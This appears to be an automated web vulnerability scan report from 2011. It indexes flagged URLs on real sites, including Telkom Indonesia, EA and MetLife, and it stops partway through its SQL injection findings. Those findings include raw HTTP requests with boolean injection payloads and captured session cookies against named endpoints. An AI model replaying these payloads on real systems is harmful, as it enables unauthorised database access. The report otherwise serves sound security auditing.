18.8. http://d1.openx.org/afr.php

18.9. http://eastore.ea.com/integration/job/request/ShoppingCartService/ea/site/

18.10. http://eastore.ea.com/integration/job/request/ShoppingCartService/ea/site/

18.11. http://eastore.ea.com/integration/job/request/ShoppingCartService/ea/site/

18.12. http://fls.doubleclick.net/activityi

18.13. http://fls.doubleclick.net/activityi

18.14. http://fls.doubleclick.net/activityi

18.15. http://gan.doubleclick.net/gan_impression

18.16. http://googleads.g.doubleclick.net/pagead/ads

18.17. http://googleads.g.doubleclick.net/pagead/ads

18.18. http://googleads.g.doubleclick.net/pagead/ads

18.19. http://googleads.g.doubleclick.net/pagead/ads

18.20. http://googleads.g.doubleclick.net/pagead/ads

18.21. http://googleads.g.doubleclick.net/pagead/ads

18.22. http://googleads.g.doubleclick.net/pagead/ads

18.23. http://googleads.g.doubleclick.net/pagead/ads

18.24. http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849

18.25. http://mediacdn.disqus.com/1308858010/build/system/disqus.js

18.26. http://mg.dt00.net/js/g/a/gamersdailynews.com.2930.js

18.27. http://store.origin.com/DRHM/store

18.28. http://store.origin.com/store

18.29. http://store.origin.com/store

18.30. http://videogamevoters.org/eacorp/

18.31. http://web-static.ea.com/atlas/sw-combine/1308169381/aa9b219f67624074aa6ae611eb06bda0.js

18.32. http://web.sa.mapquest.com/mobil1/

18.33. http://www.asiawebdirect.com/forms/portal-feedback.html

18.34. http://www.celebritycruises.com/specials/viewHTMLPromo.do

18.35. https://www.ea.com/profile/js/facebook.jsx

18.36. https://www.ea.com/profile/js/jquery_facebox.jsx

18.37. https://www.ea.com/profile/register

18.38. http://www.facebook.com/plugins/like.php

18.39. http://www.facebook.com/plugins/like.php

18.40. http://www.facebook.com/plugins/likebox.php

18.41. http://www.facebook.com/plugins/likebox.php

18.42. http://www.google.com/search

18.43. http://www.google.com/search

18.44. http://www.google.com/url

18.45. http://www.google.com/url

18.46. http://www.google.com/url

18.47. http://www.google.com/url

18.48. http://www.google.com/url

18.49. http://www.info.ea.com/

18.50. http://www.metlife.com/about/index.html

18.51. http://www.metlife.com/individual/employee-benefits/index.html

18.52. http://www.metlife.com/individual/insurance/disability-insurance/index.html

18.53. http://www.metlife.com/individual/insurance/life-insurance/hp-life-insurance-quote.html

18.54. http://www.metlife.com/wps/MCTridionWSProxy/TridionMCService/PageContent/metlife/individual/index.html

18.55. http://www.onlinecomcast.com/

18.56. http://www.phuket-travel.com/nightlife/fantasea.htm

18.57. http://www.phuket.com/andamanwhitebeach/

18.58. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.59. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.60. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.61. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.62. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.63. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.64. http://www.silobreaker.com/ShowWidget.aspx

19. Cross-domain script include

19.1. http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/

19.2. http://beta.telkom.co.id/

19.3. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

19.4. http://beta.telkom.co.id/info-perusahaan/

19.5. http://beta.telkom.co.id/pojok-media/artikel-infokom/

19.6. http://beta.telkom.co.id/pojok-media/berita-telkom/

19.7. http://beta.telkom.co.id/pojok-media/siaran-pers/

19.8. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

19.9. http://beta.telkom.co.id/products-services/index.html

19.10. http://beta.telkom.co.id/produk-layanan/

19.11. http://clicktoverify.truste.com/pvr.php

19.12. http://download1.parallels.com/favicon.ico

19.13. http://everquest2.com/free_to_play

19.14. http://fls.doubleclick.net/activityi

19.15. http://googleads.g.doubleclick.net/pagead/ads

19.16. http://googleads.g.doubleclick.net/pagead/ads

19.17. http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849

19.18. http://listings.mapquest.com/apps/listing

19.19. http://newerforms.wn.com/form/ad_enquiry/

19.20. http://newerforms.wn.com/form/sitemap_feedback/

19.21. http://phuket.com/

19.22. http://r1-ads.ace.advertising.com/site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html

19.23. http://store.origin.com/

19.24. http://store.origin.com/DRHM/store

19.25. http://store.origin.com/store

19.26. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800

19.27. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800

19.28. http://store.origin.com/store/ea/en_US/pd/ThemeID.718200/productID.201797000

19.29. http://store.origin.com/store/ea/home/

19.30. http://videogamevoters.org/eacorp/

19.31. http://videogamevoters.org/index.php/modal/sc-soon

19.32. http://videogamevoters.org/page/s/raiseyourvoice

19.33. http://web.sa.mapquest.com/mobil1/

19.34. http://www.asiawebdirect.com/forms/portal-feedback.html

19.35. http://www.citibank.com/favicon.ico

19.36. http://www.ea.com/

19.37. http://www.ea.com/1/product-eulas

19.38. https://www.ea.com/profile/register

19.39. http://www.facebook.com/login.php

19.40. http://www.facebook.com/plugins/like.php

19.41. http://www.facebook.com/plugins/like.php

19.42. http://www.facebook.com/plugins/likebox.php

19.43. http://www.metlife.com/about/index.html

19.44. http://www.metlife.com/individual/employee-benefits/index.html

19.45. http://www.metlife.com/individual/insurance/disability-insurance/index.html

19.46. http://www.metlife.com/individual/insurance/life-insurance/hp-life-insurance-quote.html

19.47. http://www.onlinecomcast.com/

19.48. http://www.phuket-travel.com/

19.49. http://www.phuket-travel.com/nightlife/fantasea.htm

19.50. http://www.phuket-travel.com/premium-packages/index.htm

19.51. http://www.phuket.com/andamanwhitebeach/

19.52. http://www.phuket.com/islands/index.htm

19.53. http://www.silobreaker.com/ShowWidget.aspx

19.54. http://www.silobreaker.com/spil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174

19.55. http://www.telkomsel.com/product/blackberry/550-Paket-BlackBerry-Pilihan.html

19.56. http://www.telkomsel.com/product/blackberry/undefined

20. File upload functionality

20.1. http://mediacdn.disqus.com/1308858010/build/system/upload.html

20.2. http://videogamevoters.org/page/s/raiseyourvoice

21. TRACE method is enabled

21.1. http://beta.telkom.co.id/

21.2. http://d1.openx.org/

21.3. http://sales.swsoft.com/

21.4. https://shop.marketplace.parallels.com/

21.5. https://softlayer.parallelsmarketplace.com/

21.6. http://www.addthis.com/

21.7. http://www.parallels.com/

22. Email addresses disclosed

22.1. http://beta.telkom.co.id/info-perusahaan/

22.2. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

22.3. http://beta.telkom.co.id/products-services/index.html

22.4. http://beta.telkom.co.id/produk-layanan/

22.5. http://beta.telkom.co.id/theme/Standard/js/curvycorners.src.js

22.6. http://cdn.wn.com/or/js/jquery.hoverIntent.minified.js

22.7. http://clicktoverify.truste.com/common/css/validate2_1_big.css

22.8. http://clicktoverify.truste.com/css/styles.css

22.9. http://everquest2.com/_themes/global/javascript/validation/jquery_validationEngine.js

22.10. http://everquest2.com/javascript/s_code.js

22.11. http://hotels.asiawebdirect.com/scripts/s_code.js

22.12. http://legal.ea.com/legal/legal.jsp

22.13. http://mediacdn.disqus.com/1308858010/build/system/disqus.js

22.14. http://newerforms.wn.com/media/js/date.js

22.15. http://newsletter.asiawebdirect.com/inxmail3/subscribe.jsp

22.16. https://softlayer.parallelsmarketplace.com/store/conf/86/lang/en.js

22.17. https://softlayer.parallelsmarketplace.com/store/index.php

22.18. http://static.asiawebdirect.com/premium/js/s_code.js

22.19. http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/

22.20. http://twitter.com/account/bootstrap_data

22.21. http://videogamevoters.org/page/-/js/vgvn-source.js

22.22. https://www.ea.com/profile/js/jquery_facebox.jsx

22.23. http://www.epm.com.co/epm/web/_admincom/admincom_pye_bienvenida.html

22.24. http://www.epm.com.co/epm/web/_admincom/banner19.html

22.25. http://www.epm.com.co/epm/web/_assets/code/mainComponentController.js

22.26. http://www.epm.com.co/epm/web/_assets/code/mtc_rev1.js

22.27. http://www.epm.com.co/epm/web/_assets/code/multicolumna.js

22.28. http://www.epm.com.co/epm/web/_assets/code/noticiasgrupo.js

22.29. http://www.epm.com.co/epm/web/_assets/code/variables_generales.cfg.js

22.30. http://www.fuelprogress.com/USA-English/GFM/Microsite/seo/js/jquery.pngFix.pack.fixed.js

22.31. http://www.gamersdailynews.com/js/lightbox.js

22.32. http://www.gamersdailynews.com/js/prototype.js

22.33. http://www.metlife.com/individual/insurance/disability-insurance/index.html

22.34. http://www.metlife.com/individual/insurance/life-insurance/hp-life-insurance-quote.html

22.35. http://www.metlife.com/wps/MCTridionWSProxy/TridionMCService/PageContent/metlife/individual/index.html

22.36. http://www.phuket-travel.com/premium-packages/index.htm

22.37. http://www.phuket-travel.com/scripts/s_code.js

22.38. http://www.pogo.com/v/FSMQBg/include/js/shared/markup2.js

22.39. http://www.pymnts.com/mysite/javascript/main.js

22.40. http://www.pymnts.com/sapphire/thirdparty/prototype/prototype.js

22.41. http://www.telkomsel.com/media/facebox/facebox.js

22.42. http://www.xobni.com/javascripts/jquery.base64.min.js

23. Private IP addresses disclosed

23.1. http://api.facebook.com/restserver.php

23.2. http://api.facebook.com/restserver.php

23.3. http://connect.facebook.net/en_GB/all.js

23.4. http://connect.facebook.net/en_US/all.js

23.5. http://download1.parallels.com/PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-user-guide/63583.htm

23.6. http://static.ak.fbcdn.net/connect.php/css/share-button-css

23.7. http://static.ak.fbcdn.net/connect.php/js/FB.Share

23.8. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.9. http://static.ak.fbcdn.net/images/connect_sprite.png

23.10. http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/ulcvK428paE.js

23.11. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/OqB3HmdoAE3.css

23.12. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

23.13. http://web-static.ea.com/us/portal/js/ea/Framework.js

23.14. http://www.facebook.com/extern/login_status.php

23.15. http://www.facebook.com/extern/login_status.php

23.16. http://www.facebook.com/extern/login_status.php

23.17. http://www.facebook.com/extern/login_status.php

23.18. http://www.facebook.com/extern/login_status.php

23.19. http://www.facebook.com/login.php

23.20. http://www.facebook.com/plugins/like.php

23.21. http://www.facebook.com/plugins/like.php

23.22. http://www.facebook.com/plugins/like.php

23.23. http://www.facebook.com/plugins/like.php

23.24. http://www.facebook.com/plugins/like.php

23.25. http://www.facebook.com/plugins/like.php

23.26. http://www.facebook.com/plugins/like.php

23.27. http://www.facebook.com/plugins/like.php

23.28. http://www.facebook.com/plugins/like.php

23.29. http://www.facebook.com/plugins/likebox.php

23.30. http://www.facebook.com/plugins/likebox.php

23.31. http://www.facebook.com/sharer/sharer.php

23.32. http://www.google.com/sdch/vD843DpA.dct

23.33. http://www.metlife.com/system/css/components_home.css

23.34. http://www.metlife.com/system/css/global.css

23.35. http://www.metlife.com/system/js/vendor/optimost.js

24. Credit card numbers disclosed

24.1. https://softlayer.parallelsmarketplace.com/store/conf/86/lang/en.js

24.2. https://softlayer.parallelsmarketplace.com/store/index.php

25. Robots.txt file

25.1. http://609167.r.msn.com/

25.2. http://a.netmng.com/

25.3. http://ad.doubleclick.net/click

25.4. http://ad.yieldmanager.com/pixel

25.5. http://adclick.g.doubleclick.net/aclk

25.6. http://apnxscm.ac3.msn.com:81/CACMSH.ashx

25.7. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

25.8. http://d1.openx.org/afr.php

25.9. http://display.digitalriver.com/

25.10. http://fls.doubleclick.net/activityi

25.11. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1034849195/

25.12. http://l.addthiscdn.com/live/t00/250lo.gif

25.13. http://rcci.122.2o7.net/b/ss/celebritycruiseprod/1/H.22.1/s6910370561759

25.14. http://s7.addthis.com/js/250/addthis_widget.js

25.15. http://segment-pixel.invitemedia.com/pixel

25.16. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.17. http://swsoft.122.2o7.net/b/ss/swsdev/1/H.21/s08157070665620

25.18. http://tracking.searchmarketing.com/welcome.asp

25.19. http://wotifcom.112.2o7.net/b/ss/wotifcom-awd-global-prd,wotifcom-awd-phuket-prd/1/H.17/s69540000788401

25.20. http://www.addthis.com/bookmark.php

25.21. http://www.celebritycruises.com/iw-cc/base/styles/iw.css

25.22. http://www.epm.com.co/

25.23. http://www.facebook.com/sharer/sharer.php

25.24. http://www.google-analytics.com/siteopt.js

25.25. http://www.googleadservices.com/pagead/conversion/1034849195/

25.26. http://www.parallels.com/en/store/plesk/win/addons/

26. Cacheable HTTPS response

26.1. https://customersupport.ea.com/loginapp/cp/login.do

26.2. https://shop.marketplace.parallels.com/http/blank.html

26.3. https://softlayer.parallelsmarketplace.com/store/design/images/favicon.ico

26.4. https://store.playstation.com/favicon.ico

26.5. https://www.ea.com/profile/register

27. Multiple content types specified

27.1. http://exxon.com/Images/lightview/close_large.png

27.2. http://exxon.com/Images/lightview/close_small.png

27.3. http://exxon.com/Images/lightview/controller_prev.png

27.4. http://exxon.com/Images/lightview/controller_slideshow_stop.png

27.5. http://exxon.com/Images/lightview/inner_next.png

27.6. http://exxon.com/Images/lightview/inner_prev.png

27.7. http://exxon.com/Images/lightview/inner_slideshow_stop.png

27.8. http://exxon.com/Images/lightview/loading.gif

27.9. http://exxon.com/Images/lightview/prev.png

27.10. http://exxon.com/Images/lightview/topclose.png

27.11. http://exxon.com/favicon.ico

27.12. http://www.fuelprogress.com/favicon.ico

28. HTML does not specify charset

28.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

28.2. http://ads.pointroll.com/PortalServe/

28.3. http://beta.telkom.co.id/op.php

28.4. http://cdn.at.atwola.com/_media/uac/tcodeqt.html

28.5. http://content.pulse360.com/43AE06D6-306A-11E0-9FBF-51F23F5BF877

28.6. http://content.pulse360.com/F81E71FC-348C-11E0-8455-C9C5E4064C68

28.7. http://display.digitalriver.com/

28.8. http://ds.addthis.com/red/psi/sites/beta.telkom.co.id/p.json

28.9. http://fls.doubleclick.net/activityi

28.10. http://mediacdn.disqus.com/1308858010/build/system/def.html

28.11. http://mediacdn.disqus.com/1308858010/build/system/reply.html

28.12. http://mediacdn.disqus.com/1308858010/build/system/upload.html

28.13. https://softlayer.parallelsmarketplace.com/design/css/spin.css

28.14. http://web.sa.mapquest.com/Images/spacer.gif

28.15. http://web.sa.mapquest.com/favicon.ico

28.16. http://www.asiawebdirect.com/forms/portal-feedback.html

28.17. http://www.citibank.com/favicon.ico

28.18. http://www.epm.com.co/epm/web/_admincom/diccionario/_admincom_dict_lista.html

28.19. http://www.epm.com.co/epm/web/_admincom/menuinstitucional2.html

28.20. http://www.epm.com.co/epm/web/_assets/code/redes_sociales.cfg.html

28.21. http://www.exxonmobilstations.com/favicon.ico

28.22. http://www.mapquest.com/cdn/_uac/adpage.htm

28.23. http://www.metlife.com/assets/cao/iws/hp/ind/hero/metricsblank.gif

28.24. http://www.metlife.com/wps/proxy/MCPremiumQuoteWS/MCHealthClassOption

28.25. http://www.metlife.com/wps/proxy/MCPremiumQuoteWS/MCPremiumQuote

28.26. http://www.phuket-travel.com/checkavailability/currency.php

28.27. http://www.phuket-travel.com/reserve/indexShort.php

28.28. http://www.phuket-travel.com/scripts/scripts.htm

29. Content type incorrectly stated

29.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

29.2. http://a.netmng.com/

29.3. http://a3.twimg.com/profile_images/58727890/PIA08370_normal.png

29.4. http://api.twitter.com/1/urls/resolve.json

29.5. http://ar.voicefive.com/b/rc.pli

29.6. http://cdn.wn.com/or/images/icons/edit24x24.png

29.7. http://cdn.wn.com/or/js/hyphenator_en-2.5.0.min.js

29.8. http://content.pulse360.com/43AE06D6-306A-11E0-9FBF-51F23F5BF877

29.9. http://content.pulse360.com/F81E71FC-348C-11E0-8455-C9C5E4064C68

29.10. http://display.digitalriver.com/

29.11. http://drh.img.digitalriver.com/DRHM/Storefront/Site/ea/pb/images/Origin_favicon.ico

29.12. http://drh2.img.digitalriver.com/favicon.ico

29.13. http://drh2.img.digitalriver.com/store

29.14. http://everquest2.com/favicon.ico

29.15. http://images.apple.com/global/nav/scripts/globalnav.js

29.16. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

29.17. http://media.celebritycruises.com/celebrity/content/en_US/images/specials/special_promotions/ports_header.jpg

29.18. https://softlayer.parallelsmarketplace.com/store/design/images/favicon.ico

29.19. https://softlayer.parallelsmarketplace.com/store/index.php

29.20. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

29.21. http://static.asiawebdirect.com/m/phuket/portals/phuket-com/homepage/islands/allParagraphs/0117/image/222

29.22. http://store.origin.com/DRHM/Storefront/Site/ea/pb/images/EA_favicon.ico

29.23. http://store.origin.com/store

29.24. https://store.playstation.com/favicon.ico

29.25. http://support.ea.com/ci/ajaxCustom/getHierValues/session/L3RpbWUvMTMwODkyMzAzMS9zaWQvOVpUQ2xqeGs%3D

29.26. http://support.ea.com/ci/browserSearch/desc/http%3A%2F%2Fsupport.ea.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/%2Feuf%2Fassets%2Fimages%2Ficons%2Ffavicon_browserSearchPlugin.ico

29.27. http://support.ea.com/euf/rightnow/optimized/1308735671/themes/ea_com/images/ico_support_home.png

29.28. http://twitter.com/favorites/xobni.json

29.29. http://v360.mqcdn.com/sv/ac/coverages.mercator.jsonp

29.30. http://v360.mqcdn.com/sv/ac/styling.mercator.jsonp

29.31. http://videogamevoters.org/ext/jquery/jquery-bsdNoConflict.js

29.32. http://videogamevoters.org/page/-/js/sys_regular.js

29.33. http://videogamevoters.org/page/spud

29.34. http://videogamevoters.org/utils/locale/load_locale.ajax.php

29.35. http://web-static.ea.com/us/portal/images/icon_downloads.png

29.36. http://web-static.ea.com/us/portal/images/icon_music.png

29.37. http://web-static.ea.com/us/portal/images/icon_photo.png

29.38. http://web-static.ea.com/us/portal/images/icon_video.png

29.39. http://www.asiawebdirect.com/customer/enquiry/template/en/lang_txt.js

29.40. http://www.ea.com/json/user-menu

29.41. http://www.epm.com.co/epm/web/_admincom/diccionario/_admincom_dict_lista.html

29.42. http://www.epm.com.co/epm/web/_admincom/menuinstitucional2.html

29.43. http://www.epm.com.co/epm/web/_assets/code/multihistorias.js

29.44. http://www.epm.com.co/epm/web/_assets/code/redes_sociales.cfg.html

29.45. http://www.facebook.com/extern/login_status.php

29.46. http://www.gamersdailynews.com/images/nextgen_green/header_split.jpg

29.47. http://www.gamersdailynews.com/images/nextgen_green/rate.jpg

29.48. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

29.49. http://www.metlife.com/assets/campaigns/search/termlife/hp/form-tile.png

29.50. http://www.metlife.com/assets/ib/insurance/disability/individual-disability-calc.jpg

29.51. http://www.metlife.com/assets/ib/insurance/disability/quiz-banner.jpg

29.52. http://www.metlife.com/system/assets/favicon.ico

29.53. http://www.metlife.com/system/css/RRvalidation.gif

29.54. http://www.metlife.com/wps/proxy/MCPremiumQuoteWS/MCHealthClassOption

29.55. http://www.metlife.com/wps/proxy/MCPremiumQuoteWS/MCPremiumQuote

29.56. http://www.parallels.com/r/css/import.css

29.57. http://www.phuket-travel.com/reserve/indexShort.php

29.58. http://www.phuket-travel.com/scripts/scripts.htm

29.59. http://www.pogo.com/include/css/pogo.css

29.60. http://www.pymnts.com/favicon.ico

29.61. http://www.xobni.com/media/fonts/Chunkfive-webfont.woff

30. Content type is not specified

30.1. http://listings.mapquest.com/apps/images/favicon_mq.ico

30.2. http://www.pogo.com/favicon.ico

31. SSL certificate

31.1. https://shop.marketplace.parallels.com/

31.2. https://softlayer.parallelsmarketplace.com/



1. SQL injection  next
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://beta.telkom.co.id/op.php [icid parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://beta.telkom.co.id
Path:   /op.php

Issue detail

The icid parameter appears to be vulnerable to SQL injection attacks. The payloads 15615320%20or%201%3d1--%20 and 15615320%20or%201%3d2--%20 were each submitted in the icid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /op.php?icid=3715615320%20or%201%3d1--%20 HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.3.10.1308921355

Response 1

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:17:49 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25708

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
       <html>
       <head>
        <meta http-equiv="content-type" content="text/html; charset=windows-1250">
        <link href="wdefault.css" rel="s
...[SNIP]...
<body>

<p class="texttitle01"><strong><font color="#00ccff">DESKRIPSI</font></strong> </p>
<p><span class="copy01">Merupakan layanan komunikasi jarak jauh antar pelanggan yang masih dalam satu wilayah negara. Pada umumnya, pelanggan-pelanggan tersebut berada dalam wilayah kode area yang berbeda.</span></p>
<p class="texttitle01"><strong><font color="#00ccff"></font></strong></p>
<p class="texttitle01"><strong><font color="#00ccff">FITUR &amp; TARIF</font></strong>&nbsp;&nbsp;&nbsp;</p>
<p><strong>Tabel Tarif Percakapan (berlaku sejak&nbsp;8 April 2008, pukul 00.00 waktu setempat) </strong></p>
<p><strong>Tarif Dasar SLJJ PSTN ke Mobile/Seluler</strong></p>
<table cellpadding="0" style="WIDTH: 536px; HEIGHT: 914px">
<tbody>
<tr class="textmenu01" style="COLOR: rgb(51,102,153)">
<td width="631" colspan="6">
<p align="center"><strong>Hari Senin s.d Sabtu </strong></p>
</td>
</tr>
<tr bgcolor="#52b3e5" class="textmenu01">
<td width="118">
<p align="center"><span class="texttitle02"><strong>Jarak (Km) </strong></span></p>
</td>
<td width="153">
<p align="center"><span class="texttitle02"><strong>Time Band </strong></span></p>
</td>
<td width="88">
<p align="center"><span class="texttitle02"><strong>Lama </strong></span></p>
</td>
<td width="94">
<p align="center"><span class="texttitle02"><strong>Baru </strong></span></p>
</td>
</tr>
<tr bgcolor="#52b3e5" class="textmenu01">
<td>&nbsp;</td>
<td>&nbsp;</td>
<td width="88">
<p align="center"><span class="texttitle02">(Rp.)/20 dtk&nbsp;</span></p>
</td>
<td width="94">
<p align="center"><span class="texttitle02">(Rp.)/20 dtk</span></p>
</td>
</tr>
<tr bgcolor="#d8e
...[SNIP]...

Request 2

GET /op.php?icid=3715615320%20or%201%3d2--%20 HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.3.10.1308921355

Response 2

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:17:51 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 435
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
       <html>
       <head>
        <meta http-equiv="content-type" content="text/html; charset=windows-1250">
        <link href="wdefault.css" rel="s
...[SNIP]...
<body>

       </BODY>
       </HTML>

1.2. http://googleads.g.doubleclick.net/pagead/ads [bpp parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The bpp parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the bpp parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=5812067516&w=160&lmt=1265919214&flash=10.3.181&url=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&dt=1308921644698&bpp=3'&shv=r20110615&jsv=r20110616&correlator=1308921644759&frm=4&adk=1526460535&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=303218268&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fphuket.com%2F&fu=0&ifi=1&dtd=74&xpc=9Mga7JBlkD&p=http%3A//www.phuket.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:29:26 GMT
Server: cafe
Cache-Control: private
Content-Length: 9000
X-XSS-Protection: 1; mode=block

